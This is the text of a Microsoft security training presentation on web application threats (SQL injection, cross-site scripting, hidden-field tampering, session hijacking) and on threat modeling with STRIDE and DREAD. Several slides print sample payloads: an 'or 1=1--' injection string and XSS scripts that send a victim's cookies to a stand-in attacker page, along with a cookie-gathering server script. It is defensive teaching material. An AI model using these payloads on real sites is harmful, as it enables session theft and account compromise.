Transcript Threats and Threat Modeling - National Chung Cheng University

Threats and Threat Modeling
Murat Gökşin Bakır
Microsoft Regional Director
Yage Ltd
Session Agenda
Types of threats
Threats against the application
SQL injection
Cross-site scripting
Input tampering
Session hijacking
More
Threat modeling
Types of Threats
Network
Host
Threats against
the network
Spoofed packets, etc.
Threats against the host
Buffer overflows, illicit paths, etc.
Threats against the application
SQL injection, XSS, input tampering, etc.
Application
Threats Against the Network
Threat
Information gathering
i
Examples
Eavesdropping
Denial of service (DoS)
Port scanning
Using trace routing to detect network topologies
Using broadcast requests to enumerate subnet
hosts
Using packet sniffers to steal passwords
SYN floods
Spoofing
ICMP echo request floods
Malformed packets
Packets with spoofed source addresses
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?
frame=true#c15618429_004
Threats Against the Host
Threat
Arbitrary code
execution
File disclosure
Denial of service (DoS)
Unauthorized access
Exploitation of open
ports and protocols
i
Examples
Buffer overflows in ISAPI DLLs (e.g., MS01-033)
Directory traversal attacks (MS00-078)
Malformed HTR requests (MS01-031)
Virtualized UNC share vulnerability (MS00-019)
Malformed SMTP requests (MS02-012)
Malformed WebDAV requests (MS01-016)
Malformed URLs (MS01-012)
Brute-force file uploads
Resources with insufficiently restrictive ACLs
Spoofing with stolen login credentials
Using NetBIOS and SMB to enumerate hosts
Connecting remotely to SQL Server
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh16.asp?
frame=true#c16618429_004
Threats Against the Application
Threat
SQL injection
Cross-site scripting
Hidden-field
tampering
Eavesdropping
Session hijacking
Identity spoofing
Information
disclosure
i
Examples
Including a DROP TABLE command in text typed
into an input field
Using malicious client-side script to steal cookies
Maliciously changing the value of a hidden field
Using a packet sniffer to steal passwords and
cookies from traffic on unencrypted connections
Using a stolen session ID cookie to access someone
else's session state
Using a stolen forms authentication cookie to pose
as another user
Allowing client to see a stack trace when an
unhandled exception occurs
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?
frame=true#c10618429_004
SQL Injection
Exploits applications that use external input
in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter
used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
How SQL Injection Works
Model Query
SELECT COUNT (*) FROM Users
WHERE UserName=‘Jeff’
AND Password=‘imbatman’
Malicious Query
SELECT COUNT (*) FROM Users
WHERE UserName=‘’ or 1=1-AND Password=‘’
"or 1=1" matches every
record in the table
"--" comments out the
remainder of the query
SQL Injection
Cross-Site Scripting (XSS)
Exploits applications that echo raw,
unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter
whose value is echoed to the Web page
Enter malicious script and get an unwary user to
navigate to the infected page
Steal cookies, deface and disable sites
How Cross-Site Scripting Works
URL of the site targeted by the attack
<a href="http://…/Search.aspx?
Search=<script language='javascript'>
document.location.replace
('http://localhost/EvilPage.aspx?
Cookie=‘ + document.cookie);
</script>">…</a>
Query string contains embedded JavaScript that
redirects to attacker’s page and transmits cookies
issued by Search.aspx in a query string
XSS – How it Works
http://www.a.com/hello.asp?name=Blake
Hello, <% =Request.QueryString(“name”) %>
http://www.b.com/gather.asp
If Request.Form(“cookie”) <> “” Then
data = Request.Form(“cookie”)
‘ Do whatever I want with the cookie
End If
Response.Redirect www.microsoft.com
The Bad URL
http://www.a.com/hello.asp?name=
<FORM action=http://www.b.com/gather.asp method=post id=“idForm”>
<INPUT name=“cookie” type=“hidden”>
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie; idForm.submit();
</SCRIPT>
Cross-Site Scripting
Cross-Site Scripting Attacks
Based on <form> Tags (2)
<a href=http://www.contoso.msft/welcome.asp?name=
<FORM action=http://www.
nwtraders.msft/data.asp
method=post id=“idForm”>
<INPUT name=“cookie” type=“hidden”>
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
here
</a>
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request
to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden
fields to persist data between requests
Hidden fields are not really hidden!
How HF Tampering Works
Page contains this…
type="hidden" prevents the field
from being seen on the page but
not in View Source
<input type=“hidden” name="price"
value="$10,000">
Postback data should contain this…
price="$10,000"
Instead it contains this…
price="$1"
Session Hijacking
Web applications use sessions to store state
Sessions are private to individual users
Sessions can be compromised
Threat
Risk Factor
Theft and replay of session ID cookies
Links to sites that use cookieless session state
Predictable session IDs
Remote connection to state server service
Remote connection to state server database
Eavesdropping on state server connection
High*
Medium*
Low*
Medium
Medium
Medium
* Shorter session time-outs mitigate the risk by reducing the attack window
Identity Spoofing
Security depends on authentication
If authentication can be compromised,
security goes out the window
Authentication can be compromised
Threat
Theft of Windows authentication credentials
Theft of forms authentication credentials
Theft and replay of authentication cookies
Dictionary attacks and password guessing
* Depends on the time-out values assigned to authentication cookies
Risk Factor
High
High
Medium*
High
Information Disclosure
Which is the
better error
message?
Information Disclosure
Threat Modeling
Structured approach to identifying,
quantifying, and addressing threats
Essential part of development process
Just like specing and designing
Just like coding and testing
One technique presented here
There are others (e.g., OCTAVE)
i
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh03.asp
The Threat Modeling Process
1
Identify assets
2
Document architecture
3
Decompose application
4
Identify threats
5
Document threats
6
Rate threats
1
Identifying Assets
What is it that you want to protect?
Private data (e.g., customer list)
Proprietary data (e.g., intellectual property)
Potentially injurious data (e.g., credit card
numbers, decryption keys)
These also count as "assets"
Integrity of back-end databases
Integrity of the Web pages (no defacement)
Integrity of other machines on the network
Availability of the application
2
Documenting Architecture
Define what the app does and how it's used
Users view pages with catalog items
Users perform searches for catalog items
Users add items to shopping carts
Users check out
Diagram the application
Show subsystems
Show data flow
List assets
Example
Asset #1 Asset #2
Database Server
Web Server
Bob
Bill
Login
Firewall
Alice
Asset #3
IIS
ASP.NET
Main
State
Asset #4
Asset #5
Asset #6
3
Decomposing the App
Refine the architecture diagram
Show authentication mechanisms
Show authorization mechanisms
Show technologies (e.g., DPAPI)
Diagram trust boundaries
Identify entry points
Begin to think like an attacker
Where are my vulnerabilities?
What am I going to do about them?
Example
Forms Authentication
URL Authorization
Web Server
Trust
Database Server
Bob
Bill
Login
Firewall
Alice
IIS
ASP.NET
Main
State
DPAPI
Windows Authentication
4
Identifying Threats
Method #1: Threat lists
Start with laundry list of possible threats
Identify the threats that apply to your app
Method #2: STRIDE
Categorized list of threat types
Identify threats by type/category
Optionally draw threat trees
Root nodes represent attacker's goals
Trees help identify threat conditions
STRIDE
S Spoofing
Can an attacker gain access using a false identity?
T Tampering
Can an attacker modify data as it flows through the application?
R Repudiation
If an attacker denies an exploit, can you prove him or her wrong?
I
Information disclosure
Can an attacker gain access to private or potentially injurious data?
of service
D Denial
Can an attacker crash or reduce the availiability of the system?
of privilege
E Elevation
Can an attacker assume the identity of a privileged user?
Threat Trees
Theft of
Auth Cookies
Obtain auth
cookie to
spoof identity
OR
AND
Unencrypted
Connection
Eavesdropping
Cookies travel
over
unencrypted
HTTP
Attacker uses
sniffer to
monitor HTTP
traffic
AND
Cross-Site
Scripting
Attacker
possesses
means and
knowledge
XSS
Vulnerability
Application is
vulnerable to
XSS attacks
5
Documenting Threats
Document threats using a template
Theft of Auth Cookies by Eavesdropping on Connection
Threat target
Risk
Attack techniques
Countermeasures
Connections between browsers and Web server
Attacker uses sniffer to monitor traffic
Use SSL/TLS to encrypt traffic
Theft of Auth Cookies via Cross-Site Scripting
Threat target
Risk
Attack techniques
Countermeasures
Vulnerable application code
Attacker sends e-mail with malicious link to users
Validate input; HTML-encode output
6
Rating Threats
Simple model
Risk = Probability * Damage Potential
1-10 Scale
1-10 Scale
1 = Least probable
10 = Most probable
1 = Least damage
10 = Most damage
DREAD model
Greater granularization of threat potential
Rates (prioritizes) each threat on scale of 1-15
Developed and widely used by Microsoft
DREAD
potential
D Damage
What are the consequences of a successful exploit?
R Reproducibility
Would an exploit work every time or only under certain circumstances?
E Exploitability
How skilled must an attacker be to exploit the vulnerability?
users
A Affected
How many users would be affected by a successful exploit?
D Discoverability
How likely is it that an attacker will know the vulnerability exists?
DREAD, Cont.
High (3)
Damage
potential
Reproducability
Attacker can
retrieve extremely
sensitive data and
corrupt or destroy
data
Works every time;
does not require a
timing window
Bart Simpson
could do it
Medium (2)
Attacker can retrieve
sensitive data but do
little else
Timing-dependent;
works only within a
time window
Exploitabilty
Attacker must be
somewhat
knowledgeable and
skilled
Affected users Most or all users
Some users
Discoverabilty Attacker can
Attacker might
easily discover the discover the
vulnerability
vulnerability
Low (1)
Attacker can only
retrieve data that has
little or no potential for
harm
Rarely works
Attacker must be
VERY knowledgeable
and skilled
Few if any users
Attacker will have to
dig to discover the
vulnerability
Example
Threat
D
R
E
A
D
Sum
Auth cookie theft (eavesdropping)
Auth cookie theft (XSS)
3
3
2
2
3
2
2
2
3
3
13
12
Potential for damage is high
(spoofed identities, etc.)
Cookie can be stolen any time,
but is only useful until expired
Anybody can run a packet
sniffer; XSS attacks require
moderate skill
All users could be affected,
but in reality most won't click
malicious links
Easy to discover: just type a
<script> block into a field
Prioritized
Risks
Additional Resources
Sanctum AppScan Developer Edition (DE)
Automated unit testing tool that enables rapid development of
Secure, Quality Web applications
 Integrates directly into Visual Studio .NET
 Real-time scanning of potential vulnerabilities
 Comprehensive defect analysis of any ASP.NET site
For more product information
http://www.sanctuminc.com/solutions/appscande/index.html


For a free product trial http://nct.digitalriver.com/fulfill/0073.1
Microsoft Developer Network
http://msdn.microsoft.com/security
Patterns and Practices Guides
http://www.microsoft.com/patterns
SafeApps™
Secure Code Assurance (SCA) engine
Replaces a manual security code review. @stake expert code
reviewer in a box.
Detects the programming errors that lead to security
vulnerabilities. Assists in remediating the errors.
Detects programming errors that lead to viruses and worms
Prioritizes risk of each error from severe error to warning. Optimizes
programmer’s time.
Guides the programmer to fix the source of error. Most
programmers don’t know how to fix security errors.
Target user
Developer, QA Engineer, Security Engineer
Development teams that use SafeApps can drastically
reduce the number of vulnerabilities in their software.
Resources/Next Steps
NGSCB is part of the Longhorn SDK
Ask your hardware and software vendors what
NGSCB-enabled components they will provide
Visit our site and read the white papers and specs
http://www.microsoft.com/ngscb
Send questions to our Q&A alias
[email protected]
Sign up for e-mail updates
Subscribe to the NGSCB information newsletter for
ongoing updates. Send blank e-mail to:
[email protected]
ASP.NET Whidbey Book
Now available for PDC bits
13 Chapters, 470 Pages
Topics Covered
Introduction, Tools & Architecture,
Data Source Controls and Data
Binding, GridView & DetailsView
Controls, Master Pages &
Navigation, Security,
Personalization & Themes, Web
Parts, Mobile Device Support, SQL
Cache Invalidation, Precompilation,
Confuguration & Administration
and more.
Purchase and review at: http://www.asp.net/whidbey
FxCop
Integer Arithmetic Vulns
Once rare, now common
Sun RPC xdr_array (http://www.securityfocus.com/bid/5356)
OpenSSH authentication (http://www.securityfocus.com/bid/5093)
Apache Chunked Encoding
(http://www.securityfocus.com/bid/5033)
Microsoft JScript
(http://www.microsoft.com/technet/security/bulletin/MS03-008.asp)
FreeBSD socket and system calls (http://www.securityfocus.com/bid/549
Snort TCP Packet Reassembly
(http://www.securityfocus.com/bid/7178)
Microsoft MIDI Decoder
(http://www.microsoft.com/technet/security/bulletin/MS03-030.asp)
OpenSSL ASN.1 Parsing
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543)
© 2003-2004 Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.